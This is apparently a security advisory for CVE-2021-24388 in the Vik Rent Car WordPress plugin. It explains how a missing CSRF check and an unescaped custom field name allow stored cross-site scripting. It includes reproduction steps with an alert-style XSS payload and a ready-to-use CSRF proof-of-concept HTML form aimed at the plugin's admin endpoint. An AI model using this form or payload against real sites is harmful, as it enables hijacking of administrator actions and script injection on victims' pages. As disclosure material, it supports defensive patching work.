Vik Rent Car < 1.1.7 – CSRF to Stored XSS | CVE 2021-24388

Description

In the plugin, there is a custom filed option by which we can manage all the fields that the users will have to fill in before saving the order. However, the field name is not sanitised or escaped before being output back in the page, leading to a stored Cross-Site Scripting issue. There is also no CSRF check done before saving the setting, allowing attackers to make a logged in admin set arbitrary Custom Fields, including one with XSS payload in it.

Note: The XSS has been fixed in 1.1.6, and the CSRF in 1.1.7

Proof of Concept

Steps To produce the bug:

1. Go to the custom fields option in the plugin (/wp-admin/admin.php?option=com_vikrentcar&task=customf)
2. Edit the field and add an XSS payload in the Field Name, ie <img src=x onerror=alert(1337)>
3. Now save that and whenever anyone visit that XSS will trigger

via CSRF

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php" method="POST">
      <input type="hidden" name="name" value="ORDER_TERMSCONDITIONS<img src onerror=alert(/XSS/)>" />
      <input type="hidden" name="type" value="checkbox" />
      <input type="hidden" name="choose[]" value="" />
      <input type="hidden" name="required" value="1" />
      <input type="hidden" name="flag" value="" />
      <input type="hidden" name="poplink" value="" />
      <input type="hidden" name="task" value="updatecustomf" />
      <input type="hidden" name="option" value="com_vikrentcar" />
      <input type="hidden" name="where" value="13" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>